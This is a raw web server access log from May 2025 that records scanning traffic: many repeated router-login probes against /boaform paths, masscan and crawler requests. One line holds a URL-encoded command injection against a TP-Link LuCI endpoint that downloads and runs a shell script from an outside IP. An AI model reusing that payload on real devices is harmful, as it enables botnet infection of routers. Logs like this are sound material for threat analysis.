45.134.225.133 - - [07/May/2025:07:40:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:41:14 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:42:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:42:26 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:07:42:27 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
212.107.12.18 - - [07/May/2025:07:42:28 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:07:42:53 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:42:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:43:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:07:43:56 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:07:43:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:45:08 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:45:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:47:25 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:47:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:47:53 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:47:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:48:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:50:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:51:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:51:24 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:52:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:53:29 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:54:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:54:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:55:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:55:30 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:55:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:56:09 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:56:41 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
62.171.138.173 - - [07/May/2025:07:57:22 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
62.171.138.173 - - [07/May/2025:07:57:46 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:58:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:58:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:07:59:34 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
95.214.54.4 - - [07/May/2025:07:59:40 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [07/May/2025:08:00:46 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
129.28.14.231 - - [07/May/2025:08:01:11 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.34 - - [07/May/2025:08:01:24 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:08:01:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:01:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
51.158.205.47 - - [07/May/2025:08:02:02 +0530] "GET / HTTP/1.0" 200 4270 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
132.232.144.200 - - [07/May/2025:08:02:21 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.134.225.133 - - [07/May/2025:08:02:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
64.62.197.185 - - [07/May/2025:08:02:36 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
45.134.225.133 - - [07/May/2025:08:03:25 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:08:03:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:04:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:05:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:08:05:13 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
64.62.197.192 - - [07/May/2025:08:05:27 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
64.62.197.186 - - [07/May/2025:08:05:46 +0530] "GET /geoserver/web/ HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
45.134.225.133 - - [07/May/2025:08:05:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:08:07:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:08:08:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:08:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.7 - - [07/May/2025:08:09:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.7 - - [07/May/2025:08:09:44 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:08:09:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:09:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:10:34 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:10:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:08:11:27 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:08:11:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:08:12:53 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:13:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:13:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:08:14:15 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:08:14:30 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:14:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:15:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:15:41 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:16:55 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:17:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:08:17:22 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
185.218.86.4 - - [07/May/2025:08:17:22 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
161.248.238.13 - - [07/May/2025:08:18:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:19:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:19:29 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:08:20:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:20:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:20:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
43.157.168.43 - - [07/May/2025:08:21:04 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
86.160.104.12 - - [07/May/2025:08:21:26 +0530] "GET / HTTP/1.0" 200 4270 "-" "curl/7.88.1"
45.134.225.133 - - [07/May/2025:08:22:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.218.86.4 - - [07/May/2025:08:23:12 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:08:23:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:24:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:08:25:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:25:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:08:25:49 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:08:26:29 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:26:39 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:08:27:56 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:08:28:40 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:29:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:29:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:08:29:19 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:08:29:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:08:29:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:30:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:30:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.98.11.27 - - [07/May/2025:08:31:34 +0530] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 224 "-" "-"
95.214.54.4 - - [07/May/2025:08:32:04 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:08:32:46 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:33:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:34:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:35:04 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:08:35:18 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:08:35:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:36:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:37:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:37:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:38:08 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
49.51.183.84 - - [07/May/2025:08:38:15 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.134.225.133 - - [07/May/2025:08:39:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.95.147.209 - - [07/May/2025:08:40:09 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1" 404 224 "-" "Go-http-client/1.1"
45.134.225.133 - - [07/May/2025:08:40:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:08:40:15 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:08:40:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:08:40:46 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:08:40:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:08:40:47 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:08:41:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.129.57 - - [07/May/2025:08:42:09 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.54.4 - - [07/May/2025:08:42:34 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
